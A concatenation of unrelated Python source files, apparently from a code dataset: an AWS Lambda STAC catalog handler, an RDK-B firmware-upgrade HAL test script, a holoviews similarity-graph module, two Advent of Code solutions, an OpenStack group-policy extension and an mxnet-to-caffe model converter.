event_source = os.getenv('EVENT_SOURCE')
# Load payload based on event source
if event_source == "s3":
bucket = event['Records'][0]['s3']['bucket']['name']
key = event['Records'][0]['s3']['object']['key']
content_object = s3_res.Object(bucket, key)
file_content = content_object.get()['Body'].read().decode('utf-8')
payload = json.loads(file_content)
elif event_source == "sns":
payload = json.loads(event['Records'][0]['Sns']['Message'])
else:
# Default is lambda
payload = event
print(payload)
try:
coll_name = payload['properties']['collection']
except KeyError:
coll_name = payload['collection']
sns_client.publish(
TopicArn=f"arn:aws:sns:{REGION}:{ACCOUNT_ID}:newStacItemTopic",
Message=json.dumps(payload),
MessageAttributes={
'collection': {
'DataType': 'String',
'StringValue': coll_name
}
}
)
def update_collection(event, context):
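    # For each queued record (STAC item JSON in record['body']), open the static
    # collection at COLLECTION_ROOT, add the item (honoring the optional PATH and
    # FILENAME layout templates), save, and optionally publish to NOTIFICATION_TOPIC.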
collection_root = os.getenv('COLLECTION_ROOT')
path = os.getenv('PATH')
filename = os.getenv('FILENAME')
item_count = len(event['Records'])
stac_links = []
for record in event['Records']:
stac_item = json.loads(record['body'])
print(stac_item)
col = Collection.open(collection_root)
collection_name = col.id
kwargs = {'item': Item(stac_item)}
if path:
kwargs.update({'path': '$' + '/$'.join(path.split('/'))})
if filename:
kwargs.update({'filename': '$' + '/$'.join(filename.split('/'))})
print(kwargs)
col.add_item(**kwargs)
col.save()
stac_links.append(kwargs['item'].links('self')[0])
# Send message to SNS Topic if enabled
if NOTIFICATION_TOPIC:
kwargs = utils.stac_to_sns(kwargs['item'].data)
kwargs.update({
'TopicArn': f"arn:aws:sns:{REGION}:{ACCOUNT_ID}:{NOTIFICATION_TOPIC}"
})
sns_client.publish(**kwargs)
print(f"LOGS CollectionName: {collection_name}\tItemCount: {item_count}\tItemLinks: {stac_links}")
def es_log_ingest(event, context):
from stac_updater import logging
cw_data = event['awslogs']['data']
compressed_payload = base64.b64decode(cw_data)
uncompressed_payload = gzip.decompress(compressed_payload)
payload = json.loads(uncompressed_payload)
# Index to ES
    logging.index_logs(payload)

# ---- end of file: stac_updater/handler.py ----
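# Hedged sketch (an illustration, not part of the original handler): the shape
# of an SNS-triggered invocation of kickoff() above. The STAC item payload is a
# made-up minimal example; actually running this requires EVENT_SOURCE=sns plus
# AWS credentials and REGION, since the handler publishes to newStacItemTopic.
def _kickoff_sns_example():
    import json
    item = {"id": "example-item", "collection": "example-collection"}
    event = {"Records": [{"Sns": {"Message": json.dumps(item)}}]}
    kickoff(event, context=None)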
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from tdkbVariables import *;
from FWUpgradeUtility import *
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("fwupgradehal","1");
obj1 = tdklib.TDKScriptingLibrary("sysutil","1");
#IP and Port of box, No need to change,
#This will be replaced with corresponding DUT Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_FWUPGRADEHAL_SetDownloadUrl');
obj1.configureTestCase(ip,port,'TS_FWUPGRADEHAL_SetDownloadUrl');
#Get the result of connection with test component and DUT
loadmodulestatus =obj.getLoadModuleResult();
loadmodulestatus1 =obj1.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus ;
print "[LIB LOAD STATUS] : %s" %loadmodulestatus1 ;
if "SUCCESS" in loadmodulestatus.upper() and "SUCCESS" in loadmodulestatus1.upper():
obj.setLoadModuleStatus("SUCCESS");
obj1.setLoadModuleStatus("SUCCESS");
expectedresult = "SUCCESS";
tdkTestObj, actualresult, FirmwareFilename = get_FirmwareFilename(obj1);
if (expectedresult in actualresult) and (FirmwareFilename != " "):
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1 : Fetch the Firmware Filename and Firmware Location URL successfully from config file";
print "EXPECTED RESULT 1 : Firmware Filename and Firmware Location URL should be fetched successfully";
print "ACTUAL RESULT 1 : Firmware Details are fetched successfully";
print "Firmware Location URL : %s" %FirmwareLocationURL;
print "FirmwareFilename : %s" %FirmwareFilename;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep("FWUPGRADEHAL_Set_Download_Url");
tdkTestObj.addParameter("URL",FirmwareLocationURL);
tdkTestObj.addParameter("filename",FirmwareFilename);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the Download URL and Filename using the HAL API fwupgrade_hal_set_download_url()";
print "EXPECTED RESULT 2: Should set the Download url: %s and Filename: %s" %(FirmwareLocationURL, FirmwareFilename);
print "ACTUAL RESULT 2: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj.createTestStep("FWUPGRADEHAL_Get_Download_Url");
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Get the Download URL and Filename using the HAL API fwupgrade_hal_get_download_url()";
print "EXPECTED RESULT 3: Should get the Download URL and Filename";
print "ACTUAL RESULT 3: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
url=details.split(" ")[2]
url = url[:-1]
fwName=details.split(" ")[5]
if url == FirmwareLocationURL and fwName == FirmwareFilename:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Verify the Download URL and Filename";
print "EXPECTED RESULT 4: Should get the Download URL and Filename same as the set value";
print "Download URL is %s and Filename is %s" %(url , fwName )
print "ACTUAL RESULT 4: The Download URL and Filename are same as the set value"
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Verify the Download URL and Filename";
print "EXPECTED RESULT 4: Should get the Download URL and Filename same as the set value";
print "Download URL is %s and Filename is %s" %(url , fwName )
print "ACTUAL RESULT 4: The Download URL and Filename are not the same as the set value"
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Get the Download URL and Filename using the HAL API fwupgrade_hal_get_download_url()";
print "EXPECTED RESULT 3: Should get the Download URL and Filename";
print "ACTUAL RESULT 3: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set the Download URL and Filename using the HAL API fwupgrade_hal_set_download_url()";
print "EXPECTED RESULT 2: Should set the Download url: %s and Filename: %s" %(FirmwareLocationURL, FirmwareFilename);
print "ACTUAL RESULT 2: %s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1 : Fetch the Firmware Filename and Firmware Location URL successfully from config file";
print "EXPECTED RESULT 1 : Firmware Filename and Firmware Location URL should be fetched successfully";
print "ACTUAL RESULT 1 : Firmware Details are not fetched successfully";
print "Firmware Location URL : %s" %FirmwareLocationURL;
print "FirmwareFilename : %s" %FirmwareFilename;
print "[TEST EXECUTION RESULT] : FAILURE";
obj.unloadModule("fwupgradehal");
obj1.unloadModule("sysutil");
else:
print "Failed to load the module";
obj.setLoadModuleStatus("FAILURE");
obj1.setLoadModuleStatus("FAILURE");
print "Module loading failed"; | testscripts/RDKB/component/FWUpgradeHAL/TS_FWUPGRADEHAL_SetDownloadUrl.py | # use tdklib library,which provides a wrapper for tdk testcase script
import itertools
import warnings
# 3rd-party modules
import holoviews as hv
from holoviews import opts, dim
from holoviews.operation.datashader import datashade, bundle_graph
import networkx as nx
import pandas as pd
# My handwritten modules
from .s3_utils import savefig
from . import knn
from . import sourmash_utils
# don't warn me about too many figures open
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.max_open_warning': 0})
KSIZES = 9, 12, 15, 21
LOG2SKETCHSIZES = 10, 12, 14, 16
MOLECULES = 'dna', 'protein'
COLOR_COLS = ['species', 'cell_label', ]
PALETTES = dict(species='Set2', cell_label='tab20')
SKETCH_ID_TEMPLATE = 'molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}'
N_NEIGHBORS = 5
def build_graph_and_plot(data, metadata, n_neighbors, color_cols, palettes,
figure_folder, figure_prefix, title):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
graph = knn.nearest_neighbor_graph(data, metadata,
n_neighbors=n_neighbors,
color_cols=color_cols,
palettes=palettes)
pos = nx.spring_layout(graph, seed=0)
for label in color_cols:
fig, ax = plt.subplots()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
knn.draw_graph(graph, edge_color='black', label_col=label, pos=pos)
ax.set_title(title)
figure_suffix = f'graph_nneighbors-{n_neighbors}_colorby-{label}'
png = f'{figure_folder}/{figure_prefix}_{figure_suffix}.png'
savefig(fig, png, dpi=150)
return graph, pos
def get_similarity_graphs(csv_template, metadata, figure_folder,
groupby='species', ksizes=KSIZES,
log2sketchsizes=LOG2SKETCHSIZES, molecules=MOLECULES,
sketch_id_template=SKETCH_ID_TEMPLATE,
n_neighbors=N_NEIGHBORS, plaidplot=False,
palettes=PALETTES, color_cols=COLOR_COLS,
verbose=False, make_within_groupby_graphs=False):
"""Read similarity csvs and create holoviews graphs
Parameters
----------
csv_template : str
format-string to insert molecule, ksize, and log2sketchsize values
into to get csv. e.g.:
'similarities_molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}.csv'
metadata : pandas.DataFrame
Sample-by-feature metadata encoding additional information about
samples, such as species, cell type label, or tissue
groupby : str
Which column of the metadata to groupby to get sub-graphs for
ksizes : tuple of int
Which k-mer sizes to look for similarity files for,
default (9, 12, 15, 21)
log2sketchsizes : tuple of int
Which log2 sketch sizes to look for similarity files for,
default (10, 12, 14, 16)
molecules : tuple of str
Which molecules to use, default both 'dna' and 'protein'
sketch_id_template : str
String to use as a unique identifier for the sketch, e.g.
'molecule-{molecule}_ksize-{ksize}_log2sketchsize-{log2sketchsize}'
plaidplot : bool
If true, make a clustered heatmap with the sides labeled with the
color_cols
palettes : dict
Column name (must be in 'metadata') to palette name mapping
color_cols : list
Column names in 'metadata' to color by
Returns
-------
graph_dict : dict of holoviews.Graph
(molecule, ksize, log2sketchsize) : holoviews.Graph mapping for all
similarity matrices found. To be used by 'draw_holoviews_graphs'
"""
# Strip the final slash because it makes s3 stuff weird
figure_folder = figure_folder.rstrip('/')
iterable = itertools.product(molecules, ksizes, log2sketchsizes)
graph_dict = {}
categories = metadata[color_cols]
for molecule, ksize, log2sketchsize in iterable:
template_kwargs = dict(molecule=molecule, ksize=ksize,
log2sketchsize=log2sketchsize)
sketch_id = sketch_id_template.format(**template_kwargs)
if verbose:
print(sketch_id.replace('-', ": ").replace("_", ", "))
csv = csv_template.format(**template_kwargs)
try:
similarities = pd.read_csv(csv)
except FileNotFoundError:
warnings.warn(f"file {csv} not found")
# File doesn't exist yet
continue
similarities.index = similarities.columns
if verbose:
print(f"\tsimilarities.shape: {similarities.shape}")
title = f"molecule: {molecule}, ksize: {ksize}, " \
f"log2sketchsize: {log2sketchsize}"
if plaidplot:
try:
g = sourmash_utils.plaidplot(similarities,
metric='cosine',
row_categories=categories,
col_categories=categories,
row_palette=palettes,
col_palette=palettes)
g.fig.suptitle(title)
png = f'{figure_folder}/{sketch_id}_plaidplot.png'
savefig(g, png, dpi=150)
except FloatingPointError:
warnings.warn("\tCouldn't compute linkage -- no plaidplot " \
"generated")
graph, pos = build_graph_and_plot(similarities, metadata,
n_neighbors, color_cols, palettes,
figure_folder,
sketch_id, title)
# hv.extension('matplotlib')
graph_hv = hv.Graph.from_networkx(graph, pos)
graph_hv = graph_hv.opts(node_size=10, edge_line_width=1, cmap='Set2',
node_color=dim(groupby),
node_line_color='gray')
bundled = bundle_graph(graph_hv)
# hv.save(bundled, '.pdf', backend='matplotlib')
graph_dict[(molecule, ksize, log2sketchsize)] = bundled
if make_within_groupby_graphs:
# make within-group (e.g. within-species) graphs
for species, df in metadata.groupby(groupby):
data = similarities.loc[df.index, df.index]
figure_prefix = f"{sketch_id}_{species}"
graph_title = f"{title} ({species})"
build_graph_and_plot(
data, df, n_neighbors, color_cols, palettes, figure_folder,
figure_prefix, graph_title)
return graph_dict
def draw_holoviews_graphs(graph_dict):
# use first key to determine default settings
first_key = list(graph_dict.keys())[0]
molecule, ksize, log2sketchsize = first_key
hv.extension('bokeh')
defaults = dict(width=400, height=400, padding=0.1)
hv.opts.defaults(
opts.EdgePaths(**defaults), opts.Graph(**defaults),
opts.Nodes(**defaults))
kdims = [
hv.Dimension(('molecule', "molecule"), default=molecule),
hv.Dimension(('ksize', "k-mer size"), default=ksize),
        hv.Dimension(('log2_num_hashes', r"$\log_2$ num hashes"),
default=log2sketchsize),
]
kwargs = dict(width=800, height=800, xaxis=None, yaxis=None)
opts.defaults(opts.Nodes(**kwargs), opts.Graph(**kwargs))
kwargs = dict(node_size=10, edge_line_width=1, cmap='Set2',
node_color=dim("species"),
node_line_color='gray', width=600, height=600, xaxis=None,
yaxis=None)
holomap = hv.HoloMap(graph_dict, kdims=kdims)
holomap.opts(opts.Graph(**kwargs))
    return holomap

# ---- end of file: khtools/holoviews.py ----
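# Hedged usage sketch (an illustration, not part of the original module): wiring
# the two helpers above together. The metadata CSV path, similarity CSV template
# and output names are placeholders; it assumes get_similarity_graphs and
# draw_holoviews_graphs defined above are in scope.
def _similarity_graph_example():
    import holoviews as hv
    import pandas as pd

    metadata = pd.read_csv('metadata.csv', index_col=0)  # placeholder path
    graph_dict = get_similarity_graphs(
        csv_template=('similarities_molecule-{molecule}_ksize-{ksize}'
                      '_log2sketchsize-{log2sketchsize}.csv'),
        metadata=metadata,
        figure_folder='figures',
        groupby='species',
        verbose=True)
    holomap = draw_holoviews_graphs(graph_dict)
    hv.save(holomap, 'similarity_graphs.html')  # interactive bokeh output
    return holomap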
INPUT_FILE = 'input.txt'
def sin(angle):
angle %= 360
if angle == 0 or angle == 180:
return 0
elif angle == 90:
return 1
elif angle == 270:
return -1
raise ValueError('Only the multiples of the right angle are supported.')
def cos(angle):
return sin(angle + 90)
def rotation_x(angle, vec):
return [
vec[0],
cos(angle) * vec[1] + -sin(angle) * vec[2],
sin(angle) * vec[1] + cos(angle) * vec[2],
]
def rotation_y(angle, vec):
return [
cos(angle) * vec[0] + sin(angle) * vec[2],
vec[1],
-sin(angle) * vec[0] + cos(angle) * vec[2],
]
def rotation_z(angle, vec):
return [
cos(angle) * vec[0] + -sin(angle) * vec[1],
sin(angle) * vec[0] + cos(angle) * vec[1],
vec[2],
]
def rotation_xyz(angle_x, angle_y, angle_z, vec):
return rotation_z(angle_z, rotation_y(angle_y, rotation_x(angle_x, vec)))
def abs(value):
if value >= 0:
return value
else:
return -value
def sign(value):
if value >= 0:
return 1
elif value < 0:
return -1
def main():
with open(INPUT_FILE, 'r') as file:
scanners = file.read().strip().split('\n\n')
for i, scanner in enumerate(scanners):
scanners[i] = [tuple(map(int, line.split(',')))
for line in scanner.split('\n')[1:]]
rotations = set()
transformations = set()
for angle1 in [0, 90, 180, 270]:
for angle2 in [0, 90, 180, 270]:
for angle3 in [0, 90, 180, 270]:
vec = rotation_xyz(angle1, angle2, angle3, [1, 2, 3])
rotations.add(tuple(vec))
for transformation in rotations:
indexes = tuple([abs(component) - 1 for component in transformation])
signs = tuple([sign(component) for component in transformation])
transformations.add((indexes, signs))
known = set(scanners.pop(0)) # first scanner is our origin point (0, 0, 0)
scanner_positions = [(0, 0, 0)]
while scanners:
matched = False
for scanner in scanners:
for transformation in transformations:
indexes, signs = transformation
nx, ny, nz = indexes
s1, s2, s3 = signs
rotated = [(s1 * beacon[nx], s2 * beacon[ny], s3 * beacon[nz])
for beacon in scanner]
for reading in known:
for beacon in rotated:
dx, dy, dz = [b_i - r_i
for b_i, r_i in zip(beacon, reading)]
translated = set([(x - dx, y - dy, z - dz)
for candidate in rotated
for x, y, z in [candidate]])
common_points = known.intersection(translated)
if len(common_points) >= 12:
scanner_position = tuple(
[r_i + -b_i
for b_i, r_i in zip(beacon, reading)]
)
scanner_positions.append(scanner_position)
known = known.union(translated)
matched = True
break
if matched:
break
if matched:
break
if matched:
break
if matched:
scanners.remove(scanner)
else:
print('Went through all, no match – something is wrong!')
break
distances = []
for index, scanner1 in enumerate(scanner_positions):
for scanner2 in scanner_positions[index + 1:]:
L1 = sum([abs(s1_i - s2_i)
for s1_i, s2_i in zip(scanner1, scanner2)])
distances.append(L1)
print(max(distances))
if __name__ == '__main__':
    main()

# ---- end of file: year-2021/day-19/part-2.py ----
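# Hedged sanity-check sketch (an illustration, not part of the original
# solution): rebuilds the rotation set derived in main() and checks that the 64
# axis-angle combinations collapse to the expected 24 distinct orientations.
# It assumes rotation_xyz from above is in scope.
def _check_rotation_count():
    rotations = set()
    for angle1 in [0, 90, 180, 270]:
        for angle2 in [0, 90, 180, 270]:
            for angle3 in [0, 90, 180, 270]:
                rotations.add(tuple(rotation_xyz(angle1, angle2, angle3, [1, 2, 3])))
    assert len(rotations) == 24, len(rotations)
    return rotations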
from neutron_lib.api import converters as conv
from neutron_lib.api import extensions
from neutron_lib import constants as nlib_const
from gbpservice.neutron.extensions import group_policy as gp
# Extended attributes for Group Policy resource to map to Neutron constructs
EXTENDED_ATTRIBUTES_2_0 = {
gp.POLICY_TARGETS: {
'port_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'fixed_ips': {'allow_post': True, 'allow_put': True,
'default': nlib_const.ATTR_NOT_SPECIFIED,
'convert_list_to': conv.convert_kvp_list_to_dict,
'validate': {'type:fixed_ips': None},
'enforce_policy': True,
'is_visible': True},
},
gp.POLICY_TARGET_GROUPS: {
'subnets': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
},
gp.L2_POLICIES: {
'network_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
},
gp.L3_POLICIES: {
'address_scope_v4_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'address_scope_v6_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
'subnetpools_v4': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
'subnetpools_v6': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
'routers': {'allow_post': True, 'allow_put': True,
'validate': {'type:uuid_list': None},
'convert_to': conv.convert_none_to_empty_list,
'is_visible': True, 'default': None},
},
gp.EXTERNAL_SEGMENTS: {
'subnet_id': {'allow_post': True, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
},
gp.NAT_POOLS: {
'subnet_id': {'allow_post': False, 'allow_put': False,
'validate': {'type:uuid_or_none': None},
'is_visible': True, 'default': None},
}
}
class Group_policy_mapping(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return "Group Policy Abstraction Mapping to Neutron Resources"
@classmethod
def get_alias(cls):
return "group-policy-mapping"
@classmethod
def get_description(cls):
return "Extension for Group Policy Abstraction Mapping"
@classmethod
def get_namespace(cls):
return "https://wiki.openstack.org/wiki/Neutron/gp/v2.0/"
@classmethod
def get_updated(cls):
return "2014-03-03T12:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
@classmethod
def get_plugin_interface(cls):
        return gp.GroupPolicyPluginBase

# ---- end of file: gbpservice/neutron/extensions/group_policy_mapping.py ----
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import argparse
import caffe
import constants
import logging
import mxnet as mx
import numpy as np
import os
import sys
from caffe import layers
from create_caffe_layers import get_caffe_layer
from parse_mxnet_symbol import MxnetParser
sys.path.append('/incubator-mxnet/example/ssd/tools/caffe_converter')
import caffe_parser # noqa
FORMAT = "[%(filename)s:%(lineno)s - %(funcName)20s() - %(levelname)-5s ] %(message)s"
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger(__name__)
INPUT_DIMS = constants.INPUT_DIMS
class MxNetToCaffe(object):
"""Convert trained model from mxnet to caffe.
Attributes:
caffe_prototxt (str): filename of the caffe prototxt
caffe_weights (str): filename of the caffe weights binary
epoch (str): mxnet epoch number of model to read weights from
net (caffe.net): caffe net object that is constructed
prefix (str): prefix of mxnet model name
"""
def __init__(self, prefix, epoch, caffe_prototxt=None, caffe_weights=None):
self.prefix = prefix
self.epoch = epoch
self.caffe_prototxt = caffe_prototxt if \
caffe_prototxt else 'caffe_models/deploy.prototxt'
self.caffe_weights = caffe_weights if \
caffe_weights else '{}_{}.caffemodel'.format(prefix, epoch)
if not os.path.isdir(os.path.dirname(self.caffe_prototxt)):
os.makedirs(os.path.dirname(self.caffe_prototxt))
self.caffe_net = None
self.convert()
def __parse_network(self):
"""Parse mxnet network and generate corresponding caffe layers.
"""
# Create caffe network
caffe_graph = caffe.NetSpec()
caffe_graph.data = layers.Input(
input_param={'shape': {'dim': [1, 3, INPUT_DIMS[0], INPUT_DIMS[1]]}})
# Assign layers from mxnet
for layer in MxnetParser(self.prefix + '-symbol.json'):
# Note: name needs to be specified explicitly to reconcile differences in mxnet and caffe norm ops.
# In caffe norm includes a scaling parameter, in mxnet these are two consecutive ops.
# So output of the caffe norm op needs to be named based on the scale op name in mxnet.
caffe_layer = get_caffe_layer(layer, caffe_graph, input_dims=INPUT_DIMS)
if layer['type'] == 'L2Normalization':
layer['name'] = 'broadcast_mul0'
if layer['type'] == 'SoftmaxOutput':
layer['name'] = 'cls_prob'
if caffe_layer:
logger.info("Converting {}".format(layer['type']))
caffe_graph[layer['name']] = caffe_layer
else:
logger.info("Skipping {}".format(layer['type']))
logger.info('Writing deploy protoxt file to {}.'.format(self.caffe_prototxt))
with open(self.caffe_prototxt, 'w') as caffe_file:
caffe_file.write(str(caffe_graph.to_proto()))
def __assign_weights(self):
"""Assign learnable network weights.
Network hyper-parameters are assumed to be already set in a previous step.
Raises:
            ValueError: if an expected weight or bias is not found in arg_params
"""
# Load caffe prototxt and set up caffe network
self.caffe_net = caffe.Net(self.caffe_prototxt, caffe.TEST)
layer_names = self.caffe_net._layer_names
layers = self.caffe_net.layers
layer_iter = caffe_parser.layer_iter(layers, layer_names)
# Load mxnet model
sym, arg_params, aux_params = mx.model.load_checkpoint(
self.prefix, self.epoch)
first_conv = True
for layer_name, layer_type, layer_blobs in layer_iter:
if layer_type == 'Normalize':
assert len(layer_blobs) == 1
weight_name = [key for key in arg_params.keys()
if key.endswith('_scale')][0]
layer_blobs[0].data[:] = np.squeeze(arg_params[weight_name].asnumpy())
elif layer_type in ('Convolution', 'InnerProduct'):
wmat_dim = list(layer_blobs[0].shape)
weight_name = layer_name + "_weight"
wmat = arg_params[weight_name].asnumpy().reshape(wmat_dim)
channels = wmat_dim[1]
if channels == 3 or channels == 4: # RGB or RGBA
if first_conv:
# Swapping RGB in mxnet into BGR of caffe
wmat[:, [0, 2], :, :] = wmat[:, [2, 0], :, :]
first_conv = False
assert wmat.flags['C_CONTIGUOUS']
logger.info('Converting layer {0}, wmat shape = {1}.'.format(
layer_name, wmat.shape))
if weight_name not in arg_params:
raise ValueError(weight_name + ' not found in arg_params.')
layer_blobs[0].data[:] = wmat
if len(layer_blobs) == 2:
bias_name = layer_name + "_bias"
if bias_name not in arg_params:
raise ValueError(bias_name + ' not found in arg_params.')
bias = arg_params[bias_name].asnumpy()
assert bias.flags['C_CONTIGUOUS']
layer_blobs[1].data[:] = np.squeeze(bias)
logger.info(', bias shape = {}.'.format(bias.shape))
else:
# Layers with no parameters
logger.info('\tSkipping layer {} of type {}'.format(
layer_name, layer_type))
assert len(layer_blobs) == 0
def convert(self):
""" Converts mxnet model to caffe model.
Reads through mxnet symbol definition json file and generates corresponding deploy.prototxt.
Assigns weights from mxnet params file to .caffemodel file.
"""
self.__parse_network()
self.__assign_weights()
logger.info('Saving caffe model in {}'.format(self.caffe_weights))
self.caffe_net.save(self.caffe_weights)
if __name__ == '__main__': # pragma: no cover
parser = argparse.ArgumentParser()
parser.add_argument("prefix", type=str,
help="prefix of mxnet model")
parser.add_argument("epoch", type=int,
help="epoch number of mxnet model")
parser.add_argument("caffe_prototxt", type=str,
help="filename of caffe deploy prototxt")
parser.add_argument("caffemodel_name", type=str,
help="Name of caffe weights file to save")
args = parser.parse_args()
    MxNetToCaffe(args.prefix, args.epoch, args.caffe_prototxt, args.caffemodel_name)

# ---- end of file: mxnet_to_caffe.py ----
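# Hedged usage note (an illustration, not part of the original script): example
# command line for the converter above. The prefix, epoch and output names are
# placeholders and assume an mxnet checkpoint pair <prefix>-symbol.json /
# <prefix>-<epoch>.params is present.
#
#   python mxnet_to_caffe.py model/ssd_300 240 caffe_models/deploy.prototxt ssd_300.caffemodel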
else:
# Layers with no parameters
logger.info('\tSkipping layer {} of type {}'.format(
layer_name, layer_type))
assert len(layer_blobs) == 0
def convert(self):
""" Converts mxnet model to caffe model.
Reads through mxnet symbol definition json file and generates corresponding deploy.prototxt.
Assigns weights from mxnet params file to .caffemodel file.
"""
self.__parse_network()
self.__assign_weights()
logger.info('Saving caffe model in {}'.format(self.caffe_weights))
self.caffe_net.save(self.caffe_weights)
if __name__ == '__main__': # pragma: no cover
parser = argparse.ArgumentParser()
parser.add_argument("prefix", type=str,
help="prefix of mxnet model")
parser.add_argument("epoch", type=int,
help="epoch number of mxnet model")
parser.add_argument("caffe_prototxt", type=str,
help="filename of caffe deploy prototxt")
parser.add_argument("caffemodel_name", type=str,
help="Name of caffe weights file to save")
args = parser.parse_args()
MxNetToCaffe(args.prefix, args.epoch, args.caffe_prototxt, args.caffemodel_name) | 0.794265 | 0.309963 |
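# A minimal standalone sketch (not part of the converter above) of the first-convolution
# channel swap it performs: mxnet weights are RGB-ordered while caffe expects BGR, so the
# R and B input channels of the first conv's weights are exchanged. The helper name and
# the dummy tensor shape are illustrative assumptions; numpy is the only dependency.
import numpy as np

def swap_rgb_bgr_first_conv(wmat):
    """Return a copy of (num_filters, channels, kh, kw) conv weights with channels 0 and 2 swapped."""
    swapped = wmat.copy()
    swapped[:, [0, 2], :, :] = swapped[:, [2, 0], :, :]
    return swapped

_demo = np.arange(2 * 3 * 1 * 1).reshape(2, 3, 1, 1)
_swapped = swap_rgb_bgr_first_conv(_demo)
assert (_swapped[:, 0] == _demo[:, 2]).all() and (_swapped[:, 2] == _demo[:, 0]).all()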
import common
import numpy as np
data = common.read_file('2017/21/data.txt')
lines = data.splitlines()
repetitions = 5   # part 1
repetitions = 18  # part 2 (overrides the part 1 value; comment this line out to run part 1)
def parse_rule(rule):
segments = rule.split(' ')
pattern_lines = segments[0].split('/')
result_lines = segments[2].split('/')
def interpret_characters(lines):
return [
[1 if x == '#' else 0 for x in line]
for line in lines
]
pattern_lines = interpret_characters(pattern_lines)
result_lines = interpret_characters(result_lines)
return len(pattern_lines), np.array(pattern_lines), np.array(result_lines)
all_rules = [parse_rule(x) for x in lines]
def transform_rules(rules):
for rule in rules:
yield rule
rot = np.rot90(rule[1])
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
flipped = np.fliplr(rule[1])
yield (rule[0], flipped, rule[2])
rot = np.rot90(flipped)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
all_rules = list(transform_rules(all_rules))
rules_2 = [x for x in all_rules if x[0] == 2]
rules_3 = [x for x in all_rules if x[0] == 3]
def eq(w1: np.ndarray, w2: np.ndarray):
return (w1 == w2).all()
board = np.array([[0, 1, 0], [0, 0, 1], [1, 1, 1]])
for i in range(repetitions):
print(i)
side = 2 if (len(board) % 2) == 0 else 3
rules = rules_2 if side == 2 else rules_3
new_side = side + 1
new_len = len(board) + int(len(board) / side)
result = np.zeros((new_len, new_len))
for y in range(0, int(len(board) / side)):
for x in range(0, int(len(board) / side)):
_y = y * side
_x = x * side
__y = y * new_side
__x = x * new_side
slc = board[_y:_y + side, _x:_x + side]
            # NOTE: this is kinda slow, but got me the result in under 5min, so I'm leaving it
for r in rules:
if eq(r[1], slc):
result[__y:__y + new_side, __x:__x + new_side] = r[2]
break
board = result
print(np.count_nonzero(board)) | 2017/21/solution.py | 0.272702 | 0.458652
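# An optional optimization sketch for the linear rule scan flagged as slow above; it is
# not part of the original solution. It assumes the same (size, pattern, result) tuples
# that transform_rules yields, and keys a dict on the pattern's bytes so each block
# lookup is O(1) instead of a scan over every rotated/flipped rule.
import numpy as np

def build_rule_index(rules):
    """Map (size, pattern-bytes) -> enhancement result for constant-time matching."""
    return {(size, pattern.astype(np.uint8).tobytes()): result
            for size, pattern, result in rules}

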